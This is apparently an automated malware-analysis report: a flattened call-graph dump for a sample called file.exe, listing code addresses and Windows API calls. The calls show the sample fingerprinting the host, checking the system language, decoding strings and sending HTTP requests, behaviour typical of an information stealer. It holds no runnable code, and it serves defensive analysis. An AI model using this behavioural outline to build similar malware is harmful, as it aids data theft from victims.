                          [Execution graph: in the original report this is an interactive call graph. Its raw data (numbered nodes labelled with code addresses of file.exe in the 0x6110a0-0x62aa24 range, image base 0x610000, and edges written as node->node) does not reproduce as text. API calls visible on the graph nodes: GetPEB, LoadLibraryA, GetProcAddress, lstrcpy, lstrlen, lstrcat, GetSystemInfo, GetCurrentProcess, VirtualAllocExNuma, VirtualAlloc, VirtualFree, VirtualProtect, GlobalMemoryStatusEx, GetProcessHeap, RtlAllocateHeap, GetUserDefaultLangID, GetUserNameA, GetComputerNameA, GetWindowsDirectoryA, GetSystemTime, SystemTimeToFileTime, sscanf, OpenEventA, CreateEventA, CloseHandle, Sleep, InternetOpenA and ExitProcess.]
lstrcpy 14166->14167 14168 6115d9 14167->14168 14169 62a7a0 lstrcpy 14168->14169 14170 611663 14169->14170 14171 625510 14170->14171 14172 625521 14171->14172 14173 62a820 2 API calls 14172->14173 14174 62552e 14173->14174 14175 62a820 2 API calls 14174->14175 14176 62553b 14175->14176 14177 62a820 2 API calls 14176->14177 14178 625548 14177->14178 14179 62a740 lstrcpy 14178->14179 14180 625555 14179->14180 14181 62a740 lstrcpy 14180->14181 14182 625562 14181->14182 14183 62a740 lstrcpy 14182->14183 14184 62556f 14183->14184 14185 62a740 lstrcpy 14184->14185 14188 62557c 14185->14188 14186 62a7a0 lstrcpy 14186->14188 14187 625643 StrCmpCA 14187->14188 14188->14186 14188->14187 14189 6256a0 StrCmpCA 14188->14189 14193 62a820 lstrlen lstrcpy 14188->14193 14195 625856 StrCmpCA 14188->14195 14198 62a740 lstrcpy 14188->14198 14203 611590 lstrcpy 14188->14203 14206 625a0b StrCmpCA 14188->14206 14207 6252c0 25 API calls 14188->14207 14214 62a8a0 lstrcpy 14188->14214 14221 62578a StrCmpCA 14188->14221 14223 62593f StrCmpCA 14188->14223 14224 6251f0 20 API calls 14188->14224 14189->14188 14190 6257dc 14189->14190 14191 62a8a0 lstrcpy 14190->14191 14192 6257e8 14191->14192 14194 62a820 2 API calls 14192->14194 14193->14188 14196 6257f6 14194->14196 14195->14188 14197 625991 14195->14197 14199 62a820 2 API calls 14196->14199 14201 62a8a0 lstrcpy 14197->14201 14198->14188 14200 625805 14199->14200 14202 611670 lstrcpy 14200->14202 14204 62599d 14201->14204 14225 625811 14202->14225 14203->14188 14205 62a820 2 API calls 14204->14205 14208 6259ab 14205->14208 14210 625a16 Sleep 14206->14210 14211 625a28 14206->14211 14207->14188 14209 62a820 2 API calls 14208->14209 14212 6259ba 14209->14212 14210->14188 14213 62a8a0 lstrcpy 14211->14213 14215 611670 lstrcpy 14212->14215 14216 625a34 14213->14216 14214->14188 14215->14225 14217 62a820 2 API calls 14216->14217 14218 625a43 14217->14218 14219 62a820 2 API calls 14218->14219 14220 625a52 14219->14220 14222 611670 lstrcpy 
14220->14222 14221->14188 14222->14225 14223->14188 14224->14188 14225->13278 14227 627553 GetVolumeInformationA 14226->14227 14228 62754c 14226->14228 14229 627591 14227->14229 14228->14227 14230 6275fc GetProcessHeap RtlAllocateHeap 14229->14230 14231 627628 wsprintfA 14230->14231 14232 627619 14230->14232 14234 62a740 lstrcpy 14231->14234 14233 62a740 lstrcpy 14232->14233 14235 625da7 14233->14235 14234->14235 14235->13299 14237 62a7a0 lstrcpy 14236->14237 14238 614899 14237->14238 15288 6147b0 14238->15288 14240 6148a5 14241 62a740 lstrcpy 14240->14241 14242 6148d7 14241->14242 14243 62a740 lstrcpy 14242->14243 14244 6148e4 14243->14244 14245 62a740 lstrcpy 14244->14245 14246 6148f1 14245->14246 14247 62a740 lstrcpy 14246->14247 14248 6148fe 14247->14248 14249 62a740 lstrcpy 14248->14249 14250 61490b InternetOpenA StrCmpCA 14249->14250 14251 614944 14250->14251 14252 614ecb InternetCloseHandle 14251->14252 15294 628b60 14251->15294 14254 614ee8 14252->14254 15309 619ac0 CryptStringToBinaryA 14254->15309 14255 614963 15302 62a920 14255->15302 14258 614976 14260 62a8a0 lstrcpy 14258->14260 14265 61497f 14260->14265 14261 62a820 2 API calls 14262 614f05 14261->14262 14264 62a9b0 4 API calls 14262->14264 14263 614f27 codecvt 14267 62a7a0 lstrcpy 14263->14267 14266 614f1b 14264->14266 14270 62a9b0 4 API calls 14265->14270 14268 62a8a0 lstrcpy 14266->14268 14269 614f57 14267->14269 14268->14263 14269->13302 14271 6149a9 14270->14271 14272 62a8a0 lstrcpy 14271->14272 14273 6149b2 14272->14273 14274 62a9b0 4 API calls 14273->14274 14275 6149d1 14274->14275 14276 62a8a0 lstrcpy 14275->14276 14277 6149da 14276->14277 14278 62a920 3 API calls 14277->14278 14279 6149f8 14278->14279 14280 62a8a0 lstrcpy 14279->14280 14281 614a01 14280->14281 14282 62a9b0 4 API calls 14281->14282 14283 614a20 14282->14283 14284 62a8a0 lstrcpy 14283->14284 14285 614a29 14284->14285 14286 62a9b0 4 API calls 14285->14286 14287 614a48 14286->14287 14288 62a8a0 lstrcpy 14287->14288 14289 614a51 
14288->14289 14290 62a9b0 4 API calls 14289->14290 14291 614a7d 14290->14291 14292 62a920 3 API calls 14291->14292 14293 614a84 14292->14293 14294 62a8a0 lstrcpy 14293->14294 14295 614a8d 14294->14295 14296 614aa3 InternetConnectA 14295->14296 14296->14252 14297 614ad3 HttpOpenRequestA 14296->14297 14299 614b28 14297->14299 14300 614ebe InternetCloseHandle 14297->14300 14301 62a9b0 4 API calls 14299->14301 14300->14252 14302 614b3c 14301->14302 14303 62a8a0 lstrcpy 14302->14303 14304 614b45 14303->14304 14305 62a920 3 API calls 14304->14305 14306 614b63 14305->14306 14307 62a8a0 lstrcpy 14306->14307 14308 614b6c 14307->14308 14309 62a9b0 4 API calls 14308->14309 14310 614b8b 14309->14310 14311 62a8a0 lstrcpy 14310->14311 14312 614b94 14311->14312 14313 62a9b0 4 API calls 14312->14313 14314 614bb5 14313->14314 14315 62a8a0 lstrcpy 14314->14315 14316 614bbe 14315->14316 14317 62a9b0 4 API calls 14316->14317 14318 614bde 14317->14318 14319 62a8a0 lstrcpy 14318->14319 14320 614be7 14319->14320 14321 62a9b0 4 API calls 14320->14321 14322 614c06 14321->14322 14323 62a8a0 lstrcpy 14322->14323 14324 614c0f 14323->14324 14325 62a920 3 API calls 14324->14325 14326 614c2d 14325->14326 14327 62a8a0 lstrcpy 14326->14327 14328 614c36 14327->14328 14329 62a9b0 4 API calls 14328->14329 14330 614c55 14329->14330 14331 62a8a0 lstrcpy 14330->14331 14332 614c5e 14331->14332 14333 62a9b0 4 API calls 14332->14333 14334 614c7d 14333->14334 14335 62a8a0 lstrcpy 14334->14335 14336 614c86 14335->14336 14337 62a920 3 API calls 14336->14337 14338 614ca4 14337->14338 14339 62a8a0 lstrcpy 14338->14339 14340 614cad 14339->14340 14341 62a9b0 4 API calls 14340->14341 14342 614ccc 14341->14342 14343 62a8a0 lstrcpy 14342->14343 14344 614cd5 14343->14344 14345 62a9b0 4 API calls 14344->14345 14346 614cf6 14345->14346 14347 62a8a0 lstrcpy 14346->14347 14348 614cff 14347->14348 14349 62a9b0 4 API calls 14348->14349 14350 614d1f 14349->14350 14351 62a8a0 lstrcpy 14350->14351 14352 614d28 14351->14352 
14353 62a9b0 4 API calls 14352->14353 14354 614d47 14353->14354 14355 62a8a0 lstrcpy 14354->14355 14356 614d50 14355->14356 14357 62a920 3 API calls 14356->14357 14358 614d6e 14357->14358 14359 62a8a0 lstrcpy 14358->14359 14360 614d77 14359->14360 14361 62a740 lstrcpy 14360->14361 14362 614d92 14361->14362 14363 62a920 3 API calls 14362->14363 14364 614db3 14363->14364 14365 62a920 3 API calls 14364->14365 14366 614dba 14365->14366 14367 62a8a0 lstrcpy 14366->14367 14368 614dc6 14367->14368 14369 614de7 lstrlen 14368->14369 14370 614dfa 14369->14370 14371 614e03 lstrlen 14370->14371 15308 62aad0 14371->15308 14373 614e13 HttpSendRequestA 14374 614e32 InternetReadFile 14373->14374 14375 614e67 InternetCloseHandle 14374->14375 14380 614e5e 14374->14380 14377 62a800 14375->14377 14377->14300 14378 62a9b0 4 API calls 14378->14380 14379 62a8a0 lstrcpy 14379->14380 14380->14374 14380->14375 14380->14378 14380->14379 15315 62aad0 14381->15315 14383 6217c4 StrCmpCA 14384 6217cf ExitProcess 14383->14384 14396 6217d7 14383->14396 14385 6219c2 14385->13304 14386 6218cf StrCmpCA 14386->14396 14387 6218ad StrCmpCA 14387->14396 14388 621932 StrCmpCA 14388->14396 14389 621913 StrCmpCA 14389->14396 14390 621970 StrCmpCA 14390->14396 14391 6218f1 StrCmpCA 14391->14396 14392 621951 StrCmpCA 14392->14396 14393 62187f StrCmpCA 14393->14396 14394 62185d StrCmpCA 14394->14396 14395 62a820 lstrlen lstrcpy 14395->14396 14396->14385 14396->14386 14396->14387 14396->14388 14396->14389 14396->14390 14396->14391 14396->14392 14396->14393 14396->14394 14396->14395 14398 62a7a0 lstrcpy 14397->14398 14399 615979 14398->14399 14400 6147b0 2 API calls 14399->14400 14401 615985 14400->14401 14402 62a740 lstrcpy 14401->14402 14403 6159ba 14402->14403 14404 62a740 lstrcpy 14403->14404 14405 6159c7 14404->14405 14406 62a740 lstrcpy 14405->14406 14407 6159d4 14406->14407 14408 62a740 lstrcpy 14407->14408 14409 6159e1 14408->14409 14410 62a740 lstrcpy 14409->14410 14411 6159ee InternetOpenA StrCmpCA 
14410->14411 14412 615a1d 14411->14412 14413 615fc3 InternetCloseHandle 14412->14413 14415 628b60 3 API calls 14412->14415 14414 615fe0 14413->14414 14417 619ac0 4 API calls 14414->14417 14416 615a3c 14415->14416 14418 62a920 3 API calls 14416->14418 14419 615fe6 14417->14419 14420 615a4f 14418->14420 14422 62a820 2 API calls 14419->14422 14425 61601f codecvt 14419->14425 14421 62a8a0 lstrcpy 14420->14421 14426 615a58 14421->14426 14423 615ffd 14422->14423 14424 62a9b0 4 API calls 14423->14424 14427 616013 14424->14427 14428 62a7a0 lstrcpy 14425->14428 14430 62a9b0 4 API calls 14426->14430 14429 62a8a0 lstrcpy 14427->14429 14434 61604f 14428->14434 14429->14425 14431 615a82 14430->14431 14432 62a8a0 lstrcpy 14431->14432 14433 615a8b 14432->14433 14435 62a9b0 4 API calls 14433->14435 14434->13310 14436 615aaa 14435->14436 14437 62a8a0 lstrcpy 14436->14437 14438 615ab3 14437->14438 14439 62a920 3 API calls 14438->14439 14440 615ad1 14439->14440 14441 62a8a0 lstrcpy 14440->14441 14442 615ada 14441->14442 14443 62a9b0 4 API calls 14442->14443 14444 615af9 14443->14444 14445 62a8a0 lstrcpy 14444->14445 14446 615b02 14445->14446 14447 62a9b0 4 API calls 14446->14447 14448 615b21 14447->14448 14449 62a8a0 lstrcpy 14448->14449 14450 615b2a 14449->14450 14451 62a9b0 4 API calls 14450->14451 14452 615b56 14451->14452 14453 62a920 3 API calls 14452->14453 14454 615b5d 14453->14454 14455 62a8a0 lstrcpy 14454->14455 14456 615b66 14455->14456 14457 615b7c InternetConnectA 14456->14457 14457->14413 14458 615bac HttpOpenRequestA 14457->14458 14460 615fb6 InternetCloseHandle 14458->14460 14461 615c0b 14458->14461 14460->14413 14462 62a9b0 4 API calls 14461->14462 14463 615c1f 14462->14463 14464 62a8a0 lstrcpy 14463->14464 14465 615c28 14464->14465 14466 62a920 3 API calls 14465->14466 14467 615c46 14466->14467 14468 62a8a0 lstrcpy 14467->14468 14469 615c4f 14468->14469 14470 62a9b0 4 API calls 14469->14470 14471 615c6e 14470->14471 14472 62a8a0 lstrcpy 14471->14472 14473 615c77 
14472->14473 14474 62a9b0 4 API calls 14473->14474 14475 615c98 14474->14475 14476 62a8a0 lstrcpy 14475->14476 14477 615ca1 14476->14477 14478 62a9b0 4 API calls 14477->14478 14479 615cc1 14478->14479 14480 62a8a0 lstrcpy 14479->14480 14481 615cca 14480->14481 14482 62a9b0 4 API calls 14481->14482 14483 615ce9 14482->14483 14484 62a8a0 lstrcpy 14483->14484 14485 615cf2 14484->14485 14486 62a920 3 API calls 14485->14486 14487 615d10 14486->14487 14488 62a8a0 lstrcpy 14487->14488 14489 615d19 14488->14489 14490 62a9b0 4 API calls 14489->14490 14491 615d38 14490->14491 14492 62a8a0 lstrcpy 14491->14492 14493 615d41 14492->14493 14494 62a9b0 4 API calls 14493->14494 14495 615d60 14494->14495 14496 62a8a0 lstrcpy 14495->14496 14497 615d69 14496->14497 14498 62a920 3 API calls 14497->14498 14499 615d87 14498->14499 14500 62a8a0 lstrcpy 14499->14500 14501 615d90 14500->14501 14502 62a9b0 4 API calls 14501->14502 14503 615daf 14502->14503 14504 62a8a0 lstrcpy 14503->14504 14505 615db8 14504->14505 14506 62a9b0 4 API calls 14505->14506 14507 615dd9 14506->14507 14508 62a8a0 lstrcpy 14507->14508 14509 615de2 14508->14509 14510 62a9b0 4 API calls 14509->14510 14511 615e02 14510->14511 14512 62a8a0 lstrcpy 14511->14512 14513 615e0b 14512->14513 14514 62a9b0 4 API calls 14513->14514 14515 615e2a 14514->14515 14516 62a8a0 lstrcpy 14515->14516 14517 615e33 14516->14517 14518 62a920 3 API calls 14517->14518 14519 615e54 14518->14519 14520 62a8a0 lstrcpy 14519->14520 14521 615e5d 14520->14521 14522 615e70 lstrlen 14521->14522 15316 62aad0 14522->15316 14524 615e81 lstrlen GetProcessHeap RtlAllocateHeap 15317 62aad0 14524->15317 14526 615eae lstrlen 14527 615ebe 14526->14527 14528 615ed7 lstrlen 14527->14528 14529 615ee7 14528->14529 14530 615ef0 lstrlen 14529->14530 14531 615f04 14530->14531 14532 615f1a lstrlen 14531->14532 15318 62aad0 14532->15318 14534 615f2a HttpSendRequestA 14535 615f35 InternetReadFile 14534->14535 14536 615f6a InternetCloseHandle 14535->14536 14540 615f61 
14535->14540 14536->14460 14538 62a9b0 4 API calls 14538->14540 14539 62a8a0 lstrcpy 14539->14540 14540->14535 14540->14536 14540->14538 14540->14539 14542 621077 14541->14542 14543 621151 14542->14543 14544 62a820 lstrlen lstrcpy 14542->14544 14543->13312 14544->14542 14546 620db7 14545->14546 14547 620f17 14546->14547 14548 620e27 StrCmpCA 14546->14548 14549 620e67 StrCmpCA 14546->14549 14550 620ea4 StrCmpCA 14546->14550 14551 62a820 lstrlen lstrcpy 14546->14551 14547->13320 14548->14546 14549->14546 14550->14546 14551->14546 14555 620f67 14552->14555 14553 621044 14553->13328 14554 620fb2 StrCmpCA 14554->14555 14555->14553 14555->14554 14556 62a820 lstrlen lstrcpy 14555->14556 14556->14555 14558 62a740 lstrcpy 14557->14558 14559 621a26 14558->14559 14560 62a9b0 4 API calls 14559->14560 14561 621a37 14560->14561 14562 62a8a0 lstrcpy 14561->14562 14563 621a40 14562->14563 14564 62a9b0 4 API calls 14563->14564 14565 621a5b 14564->14565 14566 62a8a0 lstrcpy 14565->14566 14567 621a64 14566->14567 14568 62a9b0 4 API calls 14567->14568 14569 621a7d 14568->14569 14570 62a8a0 lstrcpy 14569->14570 14571 621a86 14570->14571 14572 62a9b0 4 API calls 14571->14572 14573 621aa1 14572->14573 14574 62a8a0 lstrcpy 14573->14574 14575 621aaa 14574->14575 14576 62a9b0 4 API calls 14575->14576 14577 621ac3 14576->14577 14578 62a8a0 lstrcpy 14577->14578 14579 621acc 14578->14579 14580 62a9b0 4 API calls 14579->14580 14581 621ae7 14580->14581 14582 62a8a0 lstrcpy 14581->14582 14583 621af0 14582->14583 14584 62a9b0 4 API calls 14583->14584 14585 621b09 14584->14585 14586 62a8a0 lstrcpy 14585->14586 14587 621b12 14586->14587 14588 62a9b0 4 API calls 14587->14588 14589 621b2d 14588->14589 14590 62a8a0 lstrcpy 14589->14590 14591 621b36 14590->14591 14592 62a9b0 4 API calls 14591->14592 14593 621b4f 14592->14593 14594 62a8a0 lstrcpy 14593->14594 14595 621b58 14594->14595 14596 62a9b0 4 API calls 14595->14596 14597 621b76 14596->14597 14598 62a8a0 lstrcpy 14597->14598 14599 621b7f 
14598->14599 14600 627500 6 API calls 14599->14600 14601 621b96 14600->14601 14602 62a920 3 API calls 14601->14602 14603 621ba9 14602->14603 14604 62a8a0 lstrcpy 14603->14604 14605 621bb2 14604->14605 14606 62a9b0 4 API calls 14605->14606 14607 621bdc 14606->14607 14608 62a8a0 lstrcpy 14607->14608 14609 621be5 14608->14609 14610 62a9b0 4 API calls 14609->14610 14611 621c05 14610->14611 14612 62a8a0 lstrcpy 14611->14612 14613 621c0e 14612->14613 15319 627690 GetProcessHeap RtlAllocateHeap 14613->15319 14616 62a9b0 4 API calls 14617 621c2e 14616->14617 14618 62a8a0 lstrcpy 14617->14618 14619 621c37 14618->14619 14620 62a9b0 4 API calls 14619->14620 14621 621c56 14620->14621 14622 62a8a0 lstrcpy 14621->14622 14623 621c5f 14622->14623 14624 62a9b0 4 API calls 14623->14624 14625 621c80 14624->14625 14626 62a8a0 lstrcpy 14625->14626 14627 621c89 14626->14627 15326 6277c0 GetCurrentProcess IsWow64Process 14627->15326 14630 62a9b0 4 API calls 14631 621ca9 14630->14631 14632 62a8a0 lstrcpy 14631->14632 14633 621cb2 14632->14633 14634 62a9b0 4 API calls 14633->14634 14635 621cd1 14634->14635 14636 62a8a0 lstrcpy 14635->14636 14637 621cda 14636->14637 14638 62a9b0 4 API calls 14637->14638 14639 621cfb 14638->14639 14640 62a8a0 lstrcpy 14639->14640 14641 621d04 14640->14641 14642 627850 3 API calls 14641->14642 14643 621d14 14642->14643 14644 62a9b0 4 API calls 14643->14644 14645 621d24 14644->14645 14646 62a8a0 lstrcpy 14645->14646 14647 621d2d 14646->14647 14648 62a9b0 4 API calls 14647->14648 14649 621d4c 14648->14649 14650 62a8a0 lstrcpy 14649->14650 14651 621d55 14650->14651 14652 62a9b0 4 API calls 14651->14652 14653 621d75 14652->14653 14654 62a8a0 lstrcpy 14653->14654 14655 621d7e 14654->14655 14656 6278e0 3 API calls 14655->14656 14657 621d8e 14656->14657 14658 62a9b0 4 API calls 14657->14658 14659 621d9e 14658->14659 14660 62a8a0 lstrcpy 14659->14660 14661 621da7 14660->14661 14662 62a9b0 4 API calls 14661->14662 14663 621dc6 14662->14663 14664 62a8a0 lstrcpy 
14663->14664 14665 621dcf 14664->14665 14666 62a9b0 4 API calls 14665->14666 14667 621df0 14666->14667 14668 62a8a0 lstrcpy 14667->14668 14669 621df9 14668->14669 15328 627980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14669->15328 14672 62a9b0 4 API calls 14673 621e19 14672->14673 14674 62a8a0 lstrcpy 14673->14674 14675 621e22 14674->14675 14676 62a9b0 4 API calls 14675->14676 14677 621e41 14676->14677 14678 62a8a0 lstrcpy 14677->14678 14679 621e4a 14678->14679 14680 62a9b0 4 API calls 14679->14680 14681 621e6b 14680->14681 14682 62a8a0 lstrcpy 14681->14682 14683 621e74 14682->14683 15330 627a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14683->15330 14686 62a9b0 4 API calls 14687 621e94 14686->14687 14688 62a8a0 lstrcpy 14687->14688 14689 621e9d 14688->14689 14690 62a9b0 4 API calls 14689->14690 14691 621ebc 14690->14691 14692 62a8a0 lstrcpy 14691->14692 14693 621ec5 14692->14693 14694 62a9b0 4 API calls 14693->14694 14695 621ee5 14694->14695 14696 62a8a0 lstrcpy 14695->14696 14697 621eee 14696->14697 15333 627b00 GetUserDefaultLocaleName 14697->15333 14700 62a9b0 4 API calls 14701 621f0e 14700->14701 14702 62a8a0 lstrcpy 14701->14702 14703 621f17 14702->14703 14704 62a9b0 4 API calls 14703->14704 14705 621f36 14704->14705 14706 62a8a0 lstrcpy 14705->14706 14707 621f3f 14706->14707 14708 62a9b0 4 API calls 14707->14708 14709 621f60 14708->14709 14710 62a8a0 lstrcpy 14709->14710 14711 621f69 14710->14711 15337 627b90 14711->15337 14713 621f80 14714 62a920 3 API calls 14713->14714 14715 621f93 14714->14715 14716 62a8a0 lstrcpy 14715->14716 14717 621f9c 14716->14717 14718 62a9b0 4 API calls 14717->14718 14719 621fc6 14718->14719 14720 62a8a0 lstrcpy 14719->14720 14721 621fcf 14720->14721 14722 62a9b0 4 API calls 14721->14722 14723 621fef 14722->14723 14724 62a8a0 lstrcpy 14723->14724 14725 621ff8 14724->14725 15349 627d80 GetSystemPowerStatus 14725->15349 14728 62a9b0 4 API calls 14729 622018 14728->14729 14730 62a8a0 lstrcpy 14729->14730 14731 
622021 14730->14731 14732 62a9b0 4 API calls 14731->14732 14733 622040 14732->14733 14734 62a8a0 lstrcpy 14733->14734 14735 622049 14734->14735 14736 62a9b0 4 API calls 14735->14736 14737 62206a 14736->14737 14738 62a8a0 lstrcpy 14737->14738 14739 622073 14738->14739 14740 62207e GetCurrentProcessId 14739->14740 15351 629470 OpenProcess 14740->15351 14743 62a920 3 API calls 14744 6220a4 14743->14744 14745 62a8a0 lstrcpy 14744->14745 14746 6220ad 14745->14746 14747 62a9b0 4 API calls 14746->14747 14748 6220d7 14747->14748 14749 62a8a0 lstrcpy 14748->14749 14750 6220e0 14749->14750 14751 62a9b0 4 API calls 14750->14751 14752 622100 14751->14752 14753 62a8a0 lstrcpy 14752->14753 14754 622109 14753->14754 15356 627e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14754->15356 14757 62a9b0 4 API calls 14758 622129 14757->14758 14759 62a8a0 lstrcpy 14758->14759 14760 622132 14759->14760 14761 62a9b0 4 API calls 14760->14761 14762 622151 14761->14762 14763 62a8a0 lstrcpy 14762->14763 14764 62215a 14763->14764 14765 62a9b0 4 API calls 14764->14765 14766 62217b 14765->14766 14767 62a8a0 lstrcpy 14766->14767 14768 622184 14767->14768 15360 627f60 14768->15360 14771 62a9b0 4 API calls 14772 6221a4 14771->14772 14773 62a8a0 lstrcpy 14772->14773 14774 6221ad 14773->14774 14775 62a9b0 4 API calls 14774->14775 14776 6221cc 14775->14776 14777 62a8a0 lstrcpy 14776->14777 14778 6221d5 14777->14778 14779 62a9b0 4 API calls 14778->14779 14780 6221f6 14779->14780 14781 62a8a0 lstrcpy 14780->14781 14782 6221ff 14781->14782 15373 627ed0 GetSystemInfo wsprintfA 14782->15373 14785 62a9b0 4 API calls 14786 62221f 14785->14786 14787 62a8a0 lstrcpy 14786->14787 14788 622228 14787->14788 14789 62a9b0 4 API calls 14788->14789 14790 622247 14789->14790 14791 62a8a0 lstrcpy 14790->14791 14792 622250 14791->14792 14793 62a9b0 4 API calls 14792->14793 14794 622270 14793->14794 14795 62a8a0 lstrcpy 14794->14795 14796 622279 14795->14796 15375 628100 GetProcessHeap RtlAllocateHeap 14796->15375 14799 
62a9b0 4 API calls 14800 622299 14799->14800 14801 62a8a0 lstrcpy 14800->14801 14802 6222a2 14801->14802 14803 62a9b0 4 API calls 14802->14803 14804 6222c1 14803->14804 14805 62a8a0 lstrcpy 14804->14805 14806 6222ca 14805->14806 14807 62a9b0 4 API calls 14806->14807 14808 6222eb 14807->14808 14809 62a8a0 lstrcpy 14808->14809 14810 6222f4 14809->14810 15381 6287c0 14810->15381 14813 62a920 3 API calls 14814 62231e 14813->14814 14815 62a8a0 lstrcpy 14814->14815 14816 622327 14815->14816 14817 62a9b0 4 API calls 14816->14817 14818 622351 14817->14818 14819 62a8a0 lstrcpy 14818->14819 14820 62235a 14819->14820 14821 62a9b0 4 API calls 14820->14821 14822 62237a 14821->14822 14823 62a8a0 lstrcpy 14822->14823 14824 622383 14823->14824 14825 62a9b0 4 API calls 14824->14825 14826 6223a2 14825->14826 14827 62a8a0 lstrcpy 14826->14827 14828 6223ab 14827->14828 15386 6281f0 14828->15386 14830 6223c2 14831 62a920 3 API calls 14830->14831 14832 6223d5 14831->14832 14833 62a8a0 lstrcpy 14832->14833 14834 6223de 14833->14834 14835 62a9b0 4 API calls 14834->14835 14836 62240a 14835->14836 14837 62a8a0 lstrcpy 14836->14837 14838 622413 14837->14838 14839 62a9b0 4 API calls 14838->14839 14840 622432 14839->14840 14841 62a8a0 lstrcpy 14840->14841 14842 62243b 14841->14842 14843 62a9b0 4 API calls 14842->14843 14844 62245c 14843->14844 14845 62a8a0 lstrcpy 14844->14845 14846 622465 14845->14846 14847 62a9b0 4 API calls 14846->14847 14848 622484 14847->14848 14849 62a8a0 lstrcpy 14848->14849 14850 62248d 14849->14850 14851 62a9b0 4 API calls 14850->14851 14852 6224ae 14851->14852 14853 62a8a0 lstrcpy 14852->14853 14854 6224b7 14853->14854 15394 628320 14854->15394 14856 6224d3 14857 62a920 3 API calls 14856->14857 14858 6224e6 14857->14858 14859 62a8a0 lstrcpy 14858->14859 14860 6224ef 14859->14860 14861 62a9b0 4 API calls 14860->14861 14862 622519 14861->14862 14863 62a8a0 lstrcpy 14862->14863 14864 622522 14863->14864 14865 62a9b0 4 API calls 14864->14865 14866 622543 14865->14866 
14867 62a8a0 lstrcpy 14866->14867 14868 62254c 14867->14868 14869 628320 17 API calls 14868->14869 14870 622568 14869->14870 14871 62a920 3 API calls 14870->14871 14872 62257b 14871->14872 14873 62a8a0 lstrcpy 14872->14873 14874 622584 14873->14874 14875 62a9b0 4 API calls 14874->14875 14876 6225ae 14875->14876 14877 62a8a0 lstrcpy 14876->14877 14878 6225b7 14877->14878 14879 62a9b0 4 API calls 14878->14879 14880 6225d6 14879->14880 14881 62a8a0 lstrcpy 14880->14881 14882 6225df 14881->14882 14883 62a9b0 4 API calls 14882->14883 14884 622600 14883->14884 14885 62a8a0 lstrcpy 14884->14885 14886 622609 14885->14886 15430 628680 14886->15430 14888 622620 14889 62a920 3 API calls 14888->14889 14890 622633 14889->14890 14891 62a8a0 lstrcpy 14890->14891 14892 62263c 14891->14892 14893 62265a lstrlen 14892->14893 14894 62266a 14893->14894 14895 62a740 lstrcpy 14894->14895 14896 62267c 14895->14896 14897 611590 lstrcpy 14896->14897 14898 62268d 14897->14898 15440 625190 14898->15440 14900 622699 14900->13332 15628 62aad0 14901->15628 14903 615009 InternetOpenUrlA 14907 615021 14903->14907 14904 6150a0 InternetCloseHandle InternetCloseHandle 14906 6150ec 14904->14906 14905 61502a InternetReadFile 14905->14907 14906->13336 14907->14904 14907->14905 15629 6198d0 14908->15629 14910 620759 14911 620a38 14910->14911 14912 62077d 14910->14912 14913 611590 lstrcpy 14911->14913 14915 620799 StrCmpCA 14912->14915 14914 620a49 14913->14914 15805 620250 14914->15805 14917 6207a8 14915->14917 14944 620843 14915->14944 14919 62a7a0 lstrcpy 14917->14919 14921 6207c3 14919->14921 14920 620865 StrCmpCA 14922 620874 14920->14922 14924 62096b 14920->14924 14923 611590 lstrcpy 14921->14923 14925 62a740 lstrcpy 14922->14925 14926 62080c 14923->14926 14928 62099c StrCmpCA 14924->14928 14929 620881 14925->14929 14927 62a7a0 lstrcpy 14926->14927 14930 620823 14927->14930 14931 620a2d 14928->14931 14932 6209ab 14928->14932 14933 62a9b0 4 API calls 14929->14933 14934 62a7a0 lstrcpy 14930->14934 
14931->13340 14935 611590 lstrcpy 14932->14935 14936 6208ac 14933->14936 14937 62083e 14934->14937 14938 6209f4 14935->14938 14939 62a920 3 API calls 14936->14939 15632 61fb00 14937->15632 14941 62a7a0 lstrcpy 14938->14941 14942 6208b3 14939->14942 14945 620a0d 14941->14945 14943 62a9b0 4 API calls 14942->14943 14946 6208ba 14943->14946 14944->14920 14947 62a7a0 lstrcpy 14945->14947 14949 62a8a0 lstrcpy 14946->14949 14948 620a28 14947->14948 15748 620030 14948->15748 15280 62a7a0 lstrcpy 15279->15280 15281 611683 15280->15281 15282 62a7a0 lstrcpy 15281->15282 15283 611695 15282->15283 15284 62a7a0 lstrcpy 15283->15284 15285 6116a7 15284->15285 15286 62a7a0 lstrcpy 15285->15286 15287 6115a3 15286->15287 15287->14163 15289 6147c6 15288->15289 15290 614838 lstrlen 15289->15290 15314 62aad0 15290->15314 15292 614848 InternetCrackUrlA 15293 614867 15292->15293 15293->14240 15295 62a740 lstrcpy 15294->15295 15296 628b74 15295->15296 15297 62a740 lstrcpy 15296->15297 15298 628b82 GetSystemTime 15297->15298 15300 628b99 15298->15300 15299 62a7a0 lstrcpy 15301 628bfc 15299->15301 15300->15299 15301->14255 15303 62a931 15302->15303 15304 62a988 15303->15304 15306 62a968 lstrcpy lstrcat 15303->15306 15305 62a7a0 lstrcpy 15304->15305 15307 62a994 15305->15307 15306->15304 15307->14258 15308->14373 15310 619af9 LocalAlloc 15309->15310 15311 614eee 15309->15311 15310->15311 15312 619b14 CryptStringToBinaryA 15310->15312 15311->14261 15311->14263 15312->15311 15313 619b39 LocalFree 15312->15313 15313->15311 15314->15292 15315->14383 15316->14524 15317->14526 15318->14534 15447 6277a0 15319->15447 15322 6276c6 RegOpenKeyExA 15324 6276e7 RegQueryValueExA 15322->15324 15325 627704 RegCloseKey 15322->15325 15323 621c1e 15323->14616 15324->15325 15325->15323 15327 621c99 15326->15327 15327->14630 15329 621e09 15328->15329 15329->14672 15331 621e84 15330->15331 15332 627a9a wsprintfA 15330->15332 15331->14686 15332->15331 15334 621efe 15333->15334 15335 627b4d 15333->15335 15334->14700 
